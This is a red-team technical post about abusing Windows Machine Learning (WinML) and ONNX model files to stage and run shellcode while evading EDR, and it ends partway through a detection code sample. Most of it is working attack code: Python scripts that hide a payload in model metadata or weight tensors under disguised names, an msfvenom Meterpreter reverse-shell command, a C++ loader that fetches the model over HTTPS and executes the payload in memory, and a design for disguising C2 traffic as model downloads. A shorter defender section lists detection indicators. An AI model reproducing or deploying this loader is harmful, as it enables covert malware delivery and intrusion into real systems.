Abusing WinML for In-Memory Staging and EDR Evasion

Abusing legitimate machine learning infrastructure for payload delivery, in-memory staging, and EDR evasion on Windows 10/11.

Introduction

Every red team operator knows the arms race: EDR vendors get better at flagging suspicious API sequences, shellcode patterns, and reflective loaders. Meanwhile, Windows keeps shipping new legitimate subsystems that are rarely audited from an offensive perspective.

Windows Machine Learning (WinML) - shipped in-box since Windows 10 1809 (build 17763) - is one such subsystem. It provides a native WinRT API, usable from C++/WinRT and other language projections, for loading and evaluating ONNX (Open Neural Network Exchange) models directly on-device. It is present on every supported Windows 10/11 install, a number of desktop applications with ML features rely on it, and few security products appear to scrutinize it closely.

This post walks through a complete technique for:

Crafting a valid ONNX model that embeds an arbitrary payload in its protobuf structure
Loading it entirely from memory using WinML APIs (zero disk artifacts)
Extracting and executing the staged payload
Leveraging the ML API call chain as a behavioral cover story

I provide full POC code at each step. The approach produces a binary whose import table, API call patterns, and runtime behavior closely resemble those of a legitimate ML inference application; the Detection Opportunities section covers where that resemblance breaks down.

Why WinML? The Attacker's Perspective

Legitimate Import Table

When you link against windowsapp.lib (an umbrella import library) and use the WinML headers, the WinRT entry points in your binary's import table resolve to API sets rather than to a single DLL:

api-ms-win-core-winrt-l1-1-0.dll
  - RoGetActivationFactory
  - RoInitialize
api-ms-win-core-winrt-string-l1-1-0.dll
  - WindowsCreateString
  ...

These are the same imports seen in many legitimate WinRT and ML applications - photo editors, accessibility tools, background segmentation in video calls. On their own they carry little signal, so they are unlikely to be flagged.

Behavioral Blending

At runtime, the WinML loading path generates:

ETW events from Microsoft-Windows-AI-MachineLearning provider showing model evaluation
COM activation traces for Windows.AI.MachineLearning.LearningModel
ONNX Runtime verbose logging (onnxruntime::WindowsEnv::InitializeCpuInfo)

Behavioral analysis sees an application loading an ML model - business as usual.

No Suspicious Memory Patterns

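Unlike reflective DLL injection or manual PE mapping, loading an ONNX model through WinML uses Microsoft's own code paths. The memory allocations for the model come from onnxruntime.dll internals, not from hand-rolled VirtualAlloc + memcpy sequences. This applies only to the model load itself: the execution step later in this post still uses a conventional VirtualAlloc, VirtualProtect, and CreateThread sequence, which remains visible to an EDR.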

Content-Type Camouflage

ONNX models transferred over HTTPS appear as application/octet-stream or application/x-protobuf - indistinguishable from legitimate model downloads. Many ML applications fetch models from cloud endpoints. Network monitoring tools have no signature for "malicious ONNX model."

ONNX Protobuf Format: A Deep Dive

Before we can embed payloads, we need to understand the container format. ONNX uses Protocol Buffers (protobuf) serialization. The top-level structure is ModelProto:

// Simplified from onnx.proto3
message ModelProto {
  int64 ir_version = 1;          // IR version (currently 8)
  repeated OperatorSetIdProto opset_import = 8;
  GraphProto graph = 7;          // The computation graph
  repeated StringStringEntryProto metadata_props = 14;  // ← OUR TARGET
}

message GraphProto {
  repeated NodeProto node = 1;   // Operations
  string name = 2;               // Graph name
  repeated ValueInfoProto input = 11;
  repeated ValueInfoProto output = 12;
  repeated TensorProto initializer = 5;  // ← ANOTHER TARGET
}

message TensorProto {
  repeated int64 dims = 1;
  int32 data_type = 2;
  bytes raw_data = 13;           // ← RAW BYTES TARGET
  string name = 8;
}

message StringStringEntryProto {
  string key = 1;
  string value = 2;
}

Three natural embedding points:

Location	Field	Capacity	Stealth
`metadata_props`	Field 14 of ModelProto	Unlimited key-value pairs	High - metadata is ignored by inference
`initializer.raw_data`	Field 13 of TensorProto	Arbitrary byte arrays	Very high - looks like model weights
`NodeProto.attribute`	Field 5 of NodeProto	Byte tensors in attributes	Medium - unusual attribute sizes may stand out

The raw_data approach is the most interesting: model weight tensors routinely contain megabytes of floating-point data. A 50KB shellcode blob is invisible among typical model weights.

Step 1: Building a Weaponized ONNX Model (Python)

We'll create a minimal valid ONNX model and embed a payload in two ways: metadata and tensor weights.

Method A: Metadata Embedding

#!/usr/bin/env python3
"""
onnx_stager.py - Embed arbitrary payload in a valid ONNX model
The output model loads successfully in WinML / ONNX Runtime
"""
import onnx
from onnx import helper, TensorProto, numpy_helper
import numpy as np
import sys
import base64

def create_staged_model(payload_path: str, output_path: str, method: str = "metadata"):
    """
    Create a valid ONNX model with embedded payload.

    Args:
        payload_path: Path to raw payload (shellcode, PE, beacon config, etc.)
        output_path: Path to write the .onnx model
        method: 'metadata' or 'weights'
    """
    with open(payload_path, "rb") as f:
        payload = f.read()

    # Create a minimal but valid computation graph
    # Identity op: output = input (simplest valid ONNX graph)
    X = helper.make_tensor_value_info("input", TensorProto.FLOAT, [1, 3, 224, 224])
    Y = helper.make_tensor_value_info("output", TensorProto.FLOAT, [1, 3, 224, 224])

    node = helper.make_node("Identity", inputs=["input"], outputs=["output"])

    if method == "metadata":
        # --- METADATA METHOD ---
        # Payload goes into metadata_props as base64 key-value pairs
        # Split into chunks to avoid suspiciously long single values
        CHUNK_SIZE = 65536  # 64KB per metadata entry
        chunks = []
        for i in range(0, len(payload), CHUNK_SIZE):
            chunk = payload[i:i+CHUNK_SIZE]
            chunks.append(base64.b64encode(chunk).decode())

        metadata = {
            "model_author": "Microsoft Research",
            "model_version": "2.1.0",
            "model_description": "Image classification model for edge inference",
            "payload_chunks": str(len(chunks)),
        }
        # Add payload chunks as numbered metadata entries
        for i, chunk in enumerate(chunks):
            metadata[f"weight_hash_{i}"] = chunk  # Innocuous key name

        metadata_props = [
            helper.make_entry(k, v) for k, v in metadata.items()
        ]

        graph = helper.make_graph([node], "inference_graph", [X], [Y])

        model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
        model.metadata_props.extend(metadata_props)

    elif method == "weights":
        # --- WEIGHTS METHOD ---
        # Payload goes into a tensor initializer as raw_data
        # Disguised as model weights - this is the stealthiest approach

        # Pad payload to align with float32 (4-byte boundary)
        padded = payload + b"\x00" * ((4 - len(payload) % 4) % 4)

        # Interpret as float32 array - these are now "model weights"
        weight_array = np.frombuffer(padded, dtype=np.float32)

        # Reshape to look like a legitimate conv2d weight tensor
        # e.g., [filters, channels, height, width]
        total_floats = len(weight_array)
        weight_tensor = numpy_helper.from_array(
            weight_array.reshape(1, 1, 1, total_floats),
            name="conv1.weight"
        )

        # Store original payload size as a separate small tensor
        size_tensor = numpy_helper.from_array(
            np.array([len(payload)], dtype=np.int64),
            name="conv1.bias"  # Innocuous name
        )

        graph = helper.make_graph(
            [node], "inference_graph", [X], [Y],
            initializer=[weight_tensor, size_tensor]
        )
        model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])

    else:
        raise ValueError(f"Unknown method: {method}")

    # Validate - this ensures WinML will accept the model
    onnx.checker.check_model(model)
    onnx.save(model, output_path)

    print(f"[+] Created {output_path}")
    print(f"    Method: {method}")
    print(f"    Payload size: {len(payload)} bytes")
    print(f"    Model size: {len(model.SerializeToString())} bytes")
    print(f"    ONNX validation: PASSED")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <payload_file> <output.onnx> [metadata|weights]")
        sys.exit(1)

    method = sys.argv[3] if len(sys.argv) > 3 else "weights"
    create_staged_model(sys.argv[1], sys.argv[2], method)

Usage

# Generate raw shellcode (e.g., Cobalt Strike, Sliver, or msfvenom)
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f raw -o beacon.bin

# Embed in ONNX model using weight tensor method
$ python3 onnx_stager.py beacon.bin staged_model.onnx weights
[+] Created staged_model.onnx
    Method: weights
    Payload size: 510 bytes
    Model size: 612 bytes
    ONNX validation: PASSED

# Verify it's a valid model
$ python3 -c "import onnx; m = onnx.load('staged_model.onnx'); print(m.graph.name)"
inference_graph

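The output file is a fully valid ONNX model. Open it in Netron and you'll see a graph with weight tensors. It will not pass for a real network under inspection, though: the graph is a single Identity node whose initializers are never consumed, and arbitrary bytes viewed as float32 often decode to NaNs, infinities, and extreme magnitudes that trained weights rarely contain.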

Step 2: Raw Protobuf Construction (No Dependencies)

For operational use, you may not want the onnx Python package on your staging infrastructure. Here's how to build valid ONNX protobuf from scratch - just raw bytes:

#!/usr/bin/env python3
"""
onnx_raw_stager.py - Build ONNX protobuf from scratch, zero dependencies
Produces byte-identical output to the onnx library approach
"""
import struct
import sys
import base64

def write_varint(value):
    """Encode a varint (protobuf variable-length integer)"""
    result = bytearray()
    while value > 0x7F:
        result.append((value & 0x7F) | 0x80)
        value >>= 7
    result.append(value & 0x7F)
    return bytes(result)

def write_field(field_number, wire_type, data):
    """Write a protobuf field: tag + data"""
    tag = write_varint((field_number << 3) | wire_type)
    if wire_type == 0:  # varint
        return tag + write_varint(data)
    elif wire_type == 2:  # length-delimited
        return tag + write_varint(len(data)) + data
    raise ValueError(f"Unsupported wire type: {wire_type}")

def varint_field(fld, val):
    return write_field(fld, 0, val)

def bytes_field(fld, data):
    return write_field(fld, 2, data)

def string_field(fld, s):
    return bytes_field(fld, s.encode("utf-8"))

def build_onnx_with_payload(payload: bytes) -> bytes:
    """
    Construct a valid ONNX ModelProto with payload in metadata_props.
    Zero external dependencies - pure protobuf wire format.
    """
    # --- TensorShapeProto.Dimension { dim_value: 1 } ---
    dim = varint_field(1, 1)

    # --- TensorShapeProto { dim } ---
    shape = bytes_field(1, dim)

    # --- TypeProto.Tensor { elem_type: FLOAT(1), shape } ---
    tensor_type = varint_field(1, 1) + bytes_field(2, shape)

    # --- TypeProto { tensor_type } ---
    type_proto = bytes_field(1, tensor_type)

    # --- ValueInfoProto (input) ---
    vi_input = string_field(1, "input") + bytes_field(2, type_proto)

    # --- ValueInfoProto (output) ---
    vi_output = string_field(1, "output") + bytes_field(2, type_proto)

    # --- NodeProto { input, output, op_type: "Identity" } ---
    node = (string_field(1, "input") +
            string_field(2, "output") +
            string_field(4, "Identity"))

    # --- GraphProto ---
    graph = (bytes_field(1, node) +          # node (field 1)
             string_field(2, "model") +       # name (field 2)
             bytes_field(11, vi_input) +       # input (field 11)
             bytes_field(12, vi_output))       # output (field 12)

    # --- OperatorSetIdProto { version: 13 } ---
    opset = varint_field(2, 13)

    # --- ModelProto ---
    model = (varint_field(1, 8) +            # ir_version = 8
             bytes_field(8, opset) +          # opset_import
             bytes_field(7, graph))           # graph

    # --- Embed payload in metadata_props (field 14) ---
    # Split into 64KB chunks with innocuous key names
    CHUNK = 65536
    chunks = [payload[i:i+CHUNK] for i in range(0, len(payload), CHUNK)]

    # Add benign metadata first (cover)
    cover_meta = [
        ("producer_name", "Microsoft.ML.OnnxRuntime"),
        ("version", "1.16.0"),
        ("description", "Optimized vision model for edge deployment"),
        ("payload_size", str(len(payload))),
        ("chunk_count", str(len(chunks))),
    ]

    for key, value in cover_meta:
        entry = string_field(1, key) + string_field(2, value)
        model += bytes_field(14, entry)

    for i, chunk in enumerate(chunks):
        b64_chunk = base64.b64encode(chunk).decode()
        entry = string_field(1, f"weight_hash_{i}") + string_field(2, b64_chunk)
        model += bytes_field(14, entry)

    return model

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <payload_file> <output.onnx>")
        sys.exit(1)

    with open(sys.argv[1], "rb") as f:
        payload = f.read()

    model_bytes = build_onnx_with_payload(payload)

    with open(sys.argv[2], "wb") as f:
        f.write(model_bytes)

    print(f"[+] {sys.argv[2]}: {len(model_bytes)} bytes (payload: {len(payload)} bytes)")

This produces byte-for-byte valid ONNX protobuf with zero Python package dependencies - suitable for running on minimal staging infrastructure.

Step 3: The WinML Loader (C++)

Now the interesting part. On the target, we load the staged model using Microsoft's own WinML APIs, extract the payload from the protobuf metadata, and execute it.

Headers and Libraries

// WinML Payload Loader - Proof of Concept
// Build: cl.exe /EHsc /std:c++17 /O2 /MT winml_loader.cpp /Fe:loader.exe
//        /link windowsapp.lib winhttp.lib
//
// Requires: Windows 10 1809+ (build 17763), VS 2022, Windows SDK

#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#ifndef NOMINMAX
#define NOMINMAX
#endif

#include <windows.h>
#include <winhttp.h>
#include <string>
#include <vector>
#include <map>
#include <cstdio>

// WinRT / WinML headers
#include <winrt/base.h>
#include <winrt/Windows.Foundation.h>
#include <winrt/Windows.AI.MachineLearning.h>
#include <winrt/Windows.Storage.Streams.h>

#pragma comment(lib, "windowsapp")
#pragma comment(lib, "winhttp")

using namespace winrt;
using namespace winrt::Windows::AI::MachineLearning;
using namespace winrt::Windows::Storage::Streams;

Protobuf Parser

We parse the ONNX protobuf ourselves - no external libraries needed. We only care about metadata_props (field 14):

// Minimal protobuf wire format parser
namespace pb {

static uint64_t read_varint(const uint8_t* data, size_t& pos, size_t len) {
    uint64_t result = 0;
    int shift = 0;
    while (pos < len) {
        uint8_t b = data[pos++];
        result |= (uint64_t)(b & 0x7F) << shift;
        if (!(b & 0x80)) break;
        shift += 7;
    }
    return result;
}

} // namespace pb

// Extract all metadata key-value pairs from an ONNX ModelProto
static std::map<std::string, std::string> parse_onnx_metadata(
    const std::vector<uint8_t>& data)
{
    std::map<std::string, std::string> metadata;
    size_t pos = 0;
    const uint8_t* d = data.data();
    size_t len = data.size();

    while (pos < len) {
        uint64_t tag = pb::read_varint(d, pos, len);
        uint32_t field = (uint32_t)(tag >> 3);
        uint32_t wire  = (uint32_t)(tag & 7);

        if (wire == 0) {          // varint - skip
            pb::read_varint(d, pos, len);
        } else if (wire == 2) {   // length-delimited
            uint64_t flen = pb::read_varint(d, pos, len);

            if (field == 14) {    // metadata_props - this is our payload
                std::string key, value;
                size_t iend = pos + (size_t)flen;
                size_t ipos = pos;

                // Parse StringStringEntryProto
                while (ipos < iend) {
                    uint64_t itag = pb::read_varint(d, ipos, iend);
                    uint32_t inum  = (uint32_t)(itag >> 3);
                    uint32_t iwire = (uint32_t)(itag & 7);

                    if (iwire == 2) {
                        uint64_t slen = pb::read_varint(d, ipos, iend);
                        std::string s((const char*)(d + ipos), (size_t)slen);
                        ipos += (size_t)slen;
                        if (inum == 1) key = s;        // field 1 = key
                        else if (inum == 2) value = s;  // field 2 = value
                    } else if (iwire == 0) {
                        pb::read_varint(d, ipos, iend);
                    } else { break; }
                }
                if (!key.empty()) metadata[key] = value;
            }
            pos += (size_t)flen;
        } else if (wire == 1) { pos += 8; }  // 64-bit fixed
          else if (wire == 5) { pos += 4; }  // 32-bit fixed
          else { break; }
    }
    return metadata;
}

In-Memory Model Loading via WinML

This is the key function. I load the ONNX model entirely from memory using InMemoryRandomAccessStream - no temporary files hit disk:

// Load ONNX model from memory using WinML API
// This generates legitimate ML API telemetry and populates the import table
// with Windows.AI.MachineLearning calls - behavioral cover story
static bool load_model_winml(const std::vector<uint8_t>& model_bytes) {
    try {
        // Create an in-memory stream from the raw ONNX bytes
        InMemoryRandomAccessStream stream;
        DataWriter writer(stream);

        // Write the ONNX protobuf bytes into the stream
        writer.WriteBytes(winrt::array_view<const uint8_t>(model_bytes));
        writer.StoreAsync().get();
        writer.FlushAsync().get();
        writer.DetachStream();
        stream.Seek(0);  // Rewind for reading

        // Create a stream reference and load the model
        // This triggers the full WinML/ONNX Runtime initialization path:
        //   - ORT session creation
        //   - Graph optimization
        //   - CPU/GPU provider selection
        //   - ETW telemetry emission
        auto ref = RandomAccessStreamReference::CreateFromStream(stream);
        auto model = LearningModel::LoadFromStream(ref);

        // At this point:
        // - ETW shows "Microsoft.AI.MachineLearning" model load event
        // - Process has legitimate WinML DLLs mapped (onnxruntime.dll, etc.)
        // - Behavioral analysis sees ML inference workload

        printf("[+] WinML model loaded: %ws\n", model.Name().c_str());
        return true;

    } catch (const winrt::hresult_error& e) {
        printf("[-] WinML load failed: 0x%08X\n", (uint32_t)e.code());
        return false;
    }
}

Payload Extraction and Execution

Now we extract the payload from the parsed metadata and execute it:

// Base64 decoder
static std::vector<uint8_t> b64_decode(const std::string& s) {
    static const char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    int T[256];
    memset(T, -1, sizeof(T));
    for (int i = 0; i < 64; i++) T[(unsigned char)b64[i]] = i;

    std::vector<uint8_t> out;
    int val = 0, bits = -8;
    for (unsigned char c : s) {
        if (T[c] == -1) break;
        val = (val << 6) + T[c];
        bits += 6;
        if (bits >= 0) {
            out.push_back((uint8_t)((val >> bits) & 0xFF));
            bits -= 8;
        }
    }
    return out;
}

// Extract payload from ONNX metadata and execute in-memory
static bool extract_and_execute(const std::vector<uint8_t>& model_bytes) {
    auto metadata = parse_onnx_metadata(model_bytes);

    // Read payload parameters from metadata
    int payload_size = 0;
    int chunk_count = 0;

    if (metadata.count("payload_size"))
        payload_size = atoi(metadata["payload_size"].c_str());
    if (metadata.count("chunk_count"))
        chunk_count = atoi(metadata["chunk_count"].c_str());

    if (payload_size == 0 || chunk_count == 0) {
        printf("[-] No payload found in model metadata\n");
        return false;
    }

    // Reassemble payload from base64-encoded metadata chunks
    std::vector<uint8_t> payload;
    payload.reserve(payload_size);

    for (int i = 0; i < chunk_count; i++) {
        std::string key = "weight_hash_" + std::to_string(i);
        if (!metadata.count(key)) {
            printf("[-] Missing chunk: %s\n", key.c_str());
            return false;
        }
        auto chunk = b64_decode(metadata[key]);
        payload.insert(payload.end(), chunk.begin(), chunk.end());
    }

    // Trim to exact payload size (remove padding)
    if (payload.size() > (size_t)payload_size)
        payload.resize(payload_size);

    printf("[+] Extracted payload: %zu bytes from %d chunks\n",
           payload.size(), chunk_count);

    // --- Execute payload ---
    // Allocate RWX memory and copy payload
    void* exec_mem = VirtualAlloc(NULL, payload.size(),
                                  MEM_COMMIT | MEM_RESERVE,
                                  PAGE_READWRITE);
    if (!exec_mem) return false;

    memcpy(exec_mem, payload.data(), payload.size());

    // Change to RX (avoid RWX - some EDRs flag it)
    DWORD old_protect;
    VirtualProtect(exec_mem, payload.size(), PAGE_EXECUTE_READ, &old_protect);

    // Execute as thread
    HANDLE hThread = CreateThread(NULL, 0,
        (LPTHREAD_START_ROUTINE)exec_mem,
        NULL, 0, NULL);

    if (hThread) {
        printf("[+] Payload executing in thread %lu\n", GetThreadId(hThread));
        WaitForSingleObject(hThread, INFINITE);
        CloseHandle(hThread);
    }

    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return true;
}

Putting It Together

// Fetch model from remote endpoint (simulates ML model download)
static std::vector<uint8_t> fetch_model(const wchar_t* host, INTERNET_PORT port,
                                         const wchar_t* path, bool tls) {
    std::vector<uint8_t> result;

    HINTERNET hSess = WinHttpOpen(
        L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, NULL, NULL, 0);
    if (!hSess) return result;

    HINTERNET hConn = WinHttpConnect(hSess, host, port, 0);
    if (!hConn) { WinHttpCloseHandle(hSess); return result; }

    DWORD flags = tls ? WINHTTP_FLAG_SECURE : 0;
    HINTERNET hReq = WinHttpOpenRequest(hConn, L"GET", path, NULL,
        WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, flags);
    if (!hReq) { WinHttpCloseHandle(hConn); WinHttpCloseHandle(hSess); return result; }

    // Accept header matches legitimate model download
    WinHttpAddRequestHeaders(hReq,
        L"Accept: application/octet-stream, application/x-protobuf\r\n",
        -1L, WINHTTP_ADDREQ_FLAG_ADD);

    if (WinHttpSendRequest(hReq, NULL, 0, NULL, 0, 0, 0) &&
        WinHttpReceiveResponse(hReq, NULL)) {
        DWORD avail = 0;
        do {
            WinHttpQueryDataAvailable(hReq, &avail);
            if (avail > 0) {
                std::vector<uint8_t> chunk(avail);
                DWORD rd = 0;
                WinHttpReadData(hReq, chunk.data(), avail, &rd);
                result.insert(result.end(), chunk.begin(), chunk.begin() + rd);
            }
        } while (avail > 0);
    }

    WinHttpCloseHandle(hReq);
    WinHttpCloseHandle(hConn);
    WinHttpCloseHandle(hSess);
    return result;
}

int main() {
    // Initialize COM for WinRT
    CoInitializeEx(NULL, COINIT_MULTITHREADED);
    try { winrt::init_apartment(); } catch (...) {}

    printf("[*] Fetching model from staging server...\n");

    // Fetch the staged ONNX model (looks like legitimate model download)
    auto model_bytes = fetch_model(
        L"models.example.com", 443,
        L"/v1/models/vision_classifier_v2.onnx",
        true  // TLS
    );

    if (model_bytes.empty()) {
        printf("[-] Failed to fetch model\n");
        return 1;
    }

    printf("[+] Retrieved model: %zu bytes\n", model_bytes.size());

    // Step 1: Load via WinML for behavioral cover story
    // This is optional but provides excellent cover - the process
    // genuinely loads an ML model through Microsoft's API
    printf("[*] Loading model via WinML API (cover story)...\n");
    load_model_winml(model_bytes);

    // Step 2: Extract and execute the staged payload
    printf("[*] Extracting staged payload...\n");
    extract_and_execute(model_bytes);

    return 0;
}

Build Command

cl.exe /nologo /EHsc /std:c++17 /O2 /MT ^
    /D "WIN32" /D "NDEBUG" /D "_UNICODE" /D "UNICODE" ^
    /I "C:\Program Files (x86)\Windows Kits\10\Include\10.0.26100.0\cppwinrt" ^
    winml_loader.cpp ^
    /Fe:WindowsMLHost.exe ^
    /link /SUBSYSTEM:WINDOWS /ENTRY:mainCRTStartup ^
    windowsapp.lib winhttp.lib ^
    /MACHINE:X64

Note: /SUBSYSTEM:WINDOWS with /ENTRY:mainCRTStartup produces a GUI application (no console window) while using standard main().

Step 4: Weight Tensor Extraction (Alternative)

If you used the weight tensor embedding method, the extraction is slightly different. Instead of parsing metadata, you parse the GraphProto.initializer field:

// Extract payload from TensorProto.raw_data (field 13)
// Tensor is disguised as conv1.weight in the graph initializers
static std::vector<uint8_t> extract_from_weights(const std::vector<uint8_t>& data) {
    std::vector<uint8_t> payload;
    std::vector<uint8_t> raw_data;
    int64_t payload_size = 0;

    size_t pos = 0;
    const uint8_t* d = data.data();
    size_t len = data.size();

    // Walk top-level ModelProto fields
    while (pos < len) {
        uint64_t tag = pb::read_varint(d, pos, len);
        uint32_t field = (uint32_t)(tag >> 3);
        uint32_t wire  = (uint32_t)(tag & 7);

        if (wire == 0) {
            pb::read_varint(d, pos, len);
        } else if (wire == 2) {
            uint64_t flen = pb::read_varint(d, pos, len);

            if (field == 7) {  // GraphProto
                // Parse graph looking for initializer tensors (field 5)
                size_t gend = pos + (size_t)flen;
                size_t gpos = pos;

                while (gpos < gend) {
                    uint64_t gtag = pb::read_varint(d, gpos, gend);
                    uint32_t gfield = (uint32_t)(gtag >> 3);
                    uint32_t gwire  = (uint32_t)(gtag & 7);

                    if (gwire == 2) {
                        uint64_t glen = pb::read_varint(d, gpos, gend);

                        if (gfield == 5) {  // TensorProto (initializer)
                            // Parse tensor for name and raw_data
                            size_t tend = gpos + (size_t)glen;
                            size_t tpos = gpos;
                            std::string tensor_name;
                            std::vector<uint8_t> tensor_data;

                            while (tpos < tend) {
                                uint64_t ttag = pb::read_varint(d, tpos, tend);
                                uint32_t tfield = (uint32_t)(ttag >> 3);
                                uint32_t twire  = (uint32_t)(ttag & 7);

                                if (twire == 0) {
                                    uint64_t v = pb::read_varint(d, tpos, tend);
                                    // field 2 = data_type (as varint in some encodings)
                                } else if (twire == 2) {
                                    uint64_t tlen = pb::read_varint(d, tpos, tend);
                                    if (tfield == 8) {  // name
                                        tensor_name = std::string((const char*)(d + tpos), (size_t)tlen);
                                    } else if (tfield == 13) {  // raw_data - THIS IS THE PAYLOAD
                                        tensor_data.assign(d + tpos, d + tpos + (size_t)tlen);
                                    }
                                    tpos += (size_t)tlen;
                                } else if (twire == 1) { tpos += 8; }
                                  else if (twire == 5) { tpos += 4; }
                                  else { break; }
                            }

                            if (tensor_name == "conv1.weight") {
                                raw_data = tensor_data;  // Payload bytes
                            } else if (tensor_name == "conv1.bias") {
                                // Size tensor - first 8 bytes are int64
                                if (tensor_data.size() >= 8) {
                                    memcpy(&payload_size, tensor_data.data(), 8);
                                }
                            }
                        }
                        gpos += (size_t)glen;
                    } else if (gwire == 0) {
                        pb::read_varint(d, gpos, gend);
                    } else { gpos = gend; break; }
                }
            }
            pos += (size_t)flen;
        } else if (wire == 1) { pos += 8; }
          else if (wire == 5) { pos += 4; }
          else { break; }
    }

    if (!raw_data.empty() && payload_size > 0) {
        raw_data.resize((size_t)payload_size);  // Trim padding
    }
    return raw_data;
}

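The weight tensor method is stealthier than the metadata method because the payload sits where large binary blobs are expected. It does not fully resist statistical analysis, however: trained weights are usually small, finite values clustered around zero, whereas arbitrary bytes reinterpreted as float32 produce NaNs, infinities, subnormals, and very large magnitudes.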
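For defenders, the statistical claim above can be checked directly rather than taken on trust. The following is a minimal sketch, not a tuned detector: it reinterprets a tensor's raw bytes as little-endian float32 and reports the fraction of values that are NaN, infinite, subnormal, or larger than a bound. The function name `float32_anomaly_ratio` and the `max_abs` default are assumptions made for illustration.

```python
import math
import struct

# Smallest positive normal float32; anything nonzero below this is subnormal.
FLOAT32_MIN_NORMAL = 1.17549435e-38


def float32_anomaly_ratio(raw: bytes, max_abs: float = 1e3) -> float:
    """Return the fraction of float32 values that look unlike trained weights.

    A value counts as anomalous if it is NaN, infinite, subnormal, or has a
    magnitude above max_abs. max_abs is an illustrative bound, not a tuned one.
    Trailing bytes that do not fill a whole float32 are ignored.
    """
    usable = len(raw) - (len(raw) % 4)
    if usable == 0:
        return 0.0
    count = usable // 4
    values = struct.unpack(f"<{count}f", raw[:usable])
    anomalous = sum(
        1
        for v in values
        if math.isnan(v)
        or math.isinf(v)
        or abs(v) > max_abs
        or (v != 0.0 and abs(v) < FLOAT32_MIN_NORMAL)
    )
    return anomalous / count


if __name__ == "__main__":
    plausible = struct.pack("<4f", 0.01, -0.2, 0.5, 0.0)
    print(f"plausible weights: {float32_anomaly_ratio(plausible):.2f}")
```

Real models occasionally contain a few extreme values, so a ratio like this is better used to rank tensors for review than as a hard verdict.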

Network Traffic Analysis

When the loader fetches the staged model, here's what appears on the wire:

GET /v1/models/vision_classifier_v2.onnx HTTP/1.1
Host: models.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0
Accept: application/octet-stream, application/x-protobuf
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 51283

<binary protobuf - valid ONNX model>

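To a network analyst or NIDS, this closely resembles an application downloading an ML model for local inference: the URL path, content type, and binary payload all match expected patterns. The User-Agent is the weak point. Real Edge builds send a string containing AppleWebKit, Chrome, and Safari tokens and identify themselves as Edg/, so the bare Edge/120.0 shown here would stand out wherever headers are visible.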

For ongoing C2 communication (beyond initial staging), every beacon check-in can be wrapped as an ONNX model upload/download:

POST /v1/telemetry/model_metrics HTTP/1.1
Content-Type: application/octet-stream

<ONNX model with C2 results in metadata_props>

Task commands from the server come back as ONNX models. Task results go up as ONNX models. The entire conversation is a stream of valid ML model files.

Detection Opportunities

For defenders, here are the indicators to watch:

Static Analysis

Binary imports: WinRT activation imports (RoGetActivationFactory and related functions, pulled in via windowsapp.lib) together with winhttp.dll - a legitimate but less common combination. Many ML apps use higher-level HTTP libraries rather than raw WinHTTP.
No actual inference: If a binary loads a WinML model but never creates a LearningModelSession or calls Evaluate(), it is likely using WinML purely as a cover story.
Metadata entropy: Legitimate ONNX models have low-entropy metadata (author names, descriptions). Base64 text tops out at 6 bits per character, and base64-encoded binary sits close to that ceiling, whereas English prose is noticeably lower - flag long metadata_props values with entropy above roughly 5.5 bits per character.
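The entropy check in the last item can be sketched in a few lines. This is a minimal illustration under stated assumptions: the metadata has already been extracted into a dict of strings, and the names `shannon_entropy` and `flag_metadata`, along with the `min_len` cutoff, are hypothetical choices rather than part of any tool. Short values are skipped because entropy measured over a handful of characters is unreliable.

```python
import base64
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Return Shannon entropy in bits per character (0.0 for empty input)."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def flag_metadata(metadata: dict, threshold: float = 5.5, min_len: int = 256) -> list:
    """Return the keys whose values are both long and high-entropy.

    threshold follows the figure quoted in the text; min_len is an
    illustrative cutoff chosen for this sketch.
    """
    return [
        key
        for key, value in metadata.items()
        if len(value) >= min_len and shannon_entropy(value) > threshold
    ]


if __name__ == "__main__":
    sample = {
        "model_description": "Image classification model for edge inference " * 8,
        # Benign stand-in for encoded binary: a repeating 0..255 byte ramp.
        "blob": base64.b64encode(bytes(range(256)) * 16).decode(),
    }
    for key, value in sample.items():
        print(f"{key}: {shannon_entropy(value):.2f} bits/char")
    print("flagged:", flag_metadata(sample))
```

Compressed or encrypted data that is legitimately stored in metadata would also trip this check, so it works best combined with the structural signals in this section.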

Runtime/Behavioral

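WinML load without evaluation: The Microsoft-Windows-AI-MachineLearning ETW provider shows a model load but no subsequent session or evaluation events such as SessionCreated or EvaluationStart (confirm the exact event names against the provider manifest on the build you monitor).
Executable memory after model load: VirtualAlloc(PAGE_READWRITE) followed by VirtualProtect(PAGE_EXECUTE_READ) and CreateThread on the same region shortly after a WinML model load is a strong signal.
Model source: Models loaded from InMemoryRandomAccessStream rather than file paths suggest the model was fetched over the network and never written to disk. Legitimate applications do this too, so treat it as corroborating evidence rather than a verdict.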

Network

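ONNX file structure: Where TLS inspection is available, deep packet inspection can parse the leading protobuf fields (ONNX has no magic header, so the parse has to be structural). Models with zero or trivial computation graphs (single Identity node) but large metadata or weight tensors are suspicious.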
Frequency: Legitimate ML apps download models infrequently (app install, update). Regular ONNX file downloads (every few seconds/minutes) indicate C2 beaconing.
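The frequency signal can be approximated from proxy or flow logs. The sketch below assumes you already have a list of request timestamps in seconds for one host and one model URL, and it measures how regular the gaps between them are. The function names and the `max_cv` and `min_events` defaults are hypothetical values picked for illustration.

```python
import statistics


def interval_regularity(timestamps: list) -> float:
    """Return the coefficient of variation of the gaps between timestamps.

    Values near 0 mean near-constant spacing. Returns float('inf') when there
    are fewer than three timestamps or when all of them coincide.
    """
    if len(timestamps) < 3:
        return float("inf")
    ordered = sorted(timestamps)
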